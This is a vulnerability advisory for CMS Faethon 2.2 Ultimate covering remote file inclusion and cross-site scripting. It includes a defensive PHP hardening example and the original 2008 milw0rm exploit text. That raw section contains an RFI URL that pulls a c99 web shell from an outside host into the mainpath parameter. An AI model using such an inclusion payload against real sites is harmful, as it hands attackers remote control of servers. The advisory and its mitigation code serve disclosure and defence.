Vendor: CMS Faethon 2.2 Ultimate
By: RoMaNcYxHaCkEr
CVSS: 7.5 (HIGH)
Type: RFI & XSS
CWE: 94, 79
Product Name: CMS Faethon 2.2 Ultimate
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:cmsfaethon:cms_faethon_2.2_ultimate
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

CMS Faethon 2.2 Ultimate Multiple Remote Vulnerabilities

CMS Faethon 2.2 Ultimate is vulnerable to remote file inclusion (RFI) and cross-site scripting (XSS). The RFI issue is triggered by supplying a remote URL in the mainpath parameter of templates/header.php. The XSS issue is triggered by supplying script content in the what and where parameters of search.php.

Mitigation:

The vendor has released a patch to address these vulnerabilities. Users should upgrade to the latest version of CMS Faethon 2.2 Ultimate.
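For developers maintaining similar PHP code, the following block illustrates the hardening that removes both weakness classes named above. It is an added example, not code from CMS Faethon or from the advisory author; the $mainpath variable, the templates/header.php and search.php file names, the template allow-list and the accepted 'where' values are assumptions made for the illustration.

```php
<?php
// Added illustrative hardening example (not CMS Faethon's code).
// Assumed names: $mainpath, templates/header.php, search.php, the
// template allow-list and the accepted 'where' values.

// The RFI pattern (CWE-94) is an include whose base path comes from the
// request, e.g.  include($_GET['mainpath'] . '/templates/header.php');
// With allow_url_include=On, a remote URL in mainpath is fetched and run.
// Defence: set allow_url_include=Off (and allow_url_fopen=Off where
// possible) in php.ini, and never derive an include path from input.

define('APP_ROOT', realpath(__DIR__));

function safe_include(string $template): void
{
    // Only a fixed set of template names may ever reach include().
    $allowed = ['header.php', 'footer.php'];
    if (!in_array($template, $allowed, true)) {
        http_response_code(400);
        exit('invalid template');
    }

    // realpath() resolves ".." and returns false for missing files, so a
    // prefix check against APP_ROOT rejects anything outside the tree.
    $path = realpath(APP_ROOT . '/templates/' . $template);
    $prefix = APP_ROOT . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        http_response_code(400);
        exit('invalid template');
    }

    include $path;
}

// The XSS pattern (CWE-79) is reflecting 'what' and 'where' into HTML
// unencoded. Defence: encode free text for the HTML attribute context and
// restrict enumerated values to a known set instead of echoing them.
function render_search_form(array $get): string
{
    $what = htmlspecialchars($get['what'] ?? '', ENT_QUOTES | ENT_HTML5, 'UTF-8');

    $sections = ['articles', 'downloads'];          // assumed set of search targets
    $where = $get['where'] ?? 'articles';
    if (!in_array($where, $sections, true)) {
        $where = 'articles';
    }

    return '<form action="search.php" method="get">'
         . '<input name="what" value="' . $what . '">'
         . '<input type="hidden" name="where" value="' . $where . '">'
         . '<input type="submit" value="Search">'
         . '</form>';
}

// Usage in the page that formerly trusted $mainpath:
safe_include('header.php');
echo render_search_form($_GET);
```

The two checks are independent: the allow-list stops any unexpected file name, and the realpath prefix check guards against a later refactor that loosens the list. Disabling allow_url_include at the interpreter level is a second layer that protects every include in the application, not just this one.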

Exploit-DB raw data:

-==========================================[ ViVa Islam + YeMeN ]====================================-

# Name : CMS Faethon 2.2 Ultimate Multiple Remote Vulnerabilies

# Download From : http://cmsfaethon.org

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , aLwHEeD )        

# Home Page :  WwW.4RxH.CoM            

+======================================================================================================================+

# Exploits :

1- RFI :

http://WwW.4RxH.CoM/22_ultimate/templates/header.php?mainpath=http://rxh.freehostia.com/shells/c99in.txt?

2- XSS :

http://WwW.4RxH.CoM/22_ultimate/search.php?what=&where=articles

+=======================================================================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum & Anyone Hate Me  :) 

# For Contact : webmaster@4rxh.com

# bEST wISHES

-==========================================[ ViVa Islam + YeMeN ]====================================-

# milw0rm.com [2008-05-07]